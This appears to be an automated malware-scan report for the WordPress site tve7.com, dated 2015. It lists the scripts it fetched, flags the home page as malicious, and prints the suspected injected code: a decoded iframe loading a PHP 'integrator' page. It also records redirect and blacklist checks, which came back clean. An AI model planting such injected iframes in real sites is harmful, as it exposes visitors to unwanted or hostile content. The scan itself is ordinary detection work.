Scanned pages/files
Request | Server response | Status |
http://tve7.com/ | 200 OK Content-Length: 194754 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script: <iframe name="banner" id="banner" src="http://tve7.com/TVE1integrator.php" width=300 height=250 frameborder="0" scrolling="no" ></iframe>
Antivirus reports:
http://tve7.com/wp-includes/js/jquery/jquery.js?ver=1.11.3 | 200 OK Content-Length: 95977 Content-Type: text/javascript | clean |
http://tve7.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/player/js/jquery-ui.min.js?ver=4.3.1 | 200 OK Content-Length: 228539 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/player/js/jquery.transit.js?ver=4.3.1 | 200 OK Content-Length: 18741 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/player/js/flash_detect.js?ver=4.3.1 | 200 OK Content-Length: 7049 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/plugins/wp-automatic/js/main-front.js?ver=4.3.1 | 200 OK Content-Length: 888 Content-Type: text/javascript | clean |
http://sitelyhost.com/tve7/wp-content/themes/eVid/js/slider2.js | 200 OK Content-Length: 3084 Content-Type: text/javascript | clean |
http://www.youtube.com/player_api | 200 OK Content-Length: 744 Content-Type: application/javascript | clean |
https://f.vimeocdn.com/js/froogaloop2.min.js | 200 OK Content-Length: 1542 Content-Type: text/javascript | clean |
https://s0.2mdn.net/ads/studio/Enabler.js | 200 OK Content-Length: 97314 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/themes/eVid/js/slider.js | 200 OK Content-Length: 3637 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/themes/eVid/js/superfish.js | 200 OK Content-Length: 3812 Content-Type: text/javascript | clean |
http://tve7.com/wp-includes/js/comment-reply.min.js?ver=4.3.1 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://tve7.com/wp-content/themes/eVid/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6755 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tve7.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Sep 2015 03:29:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://tve7.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: tve7.com
Referer: http://www.google.com/search?q=tve7.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tve7.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tve7.com/
Result: tve7.com is not infected or malware details are not published yet.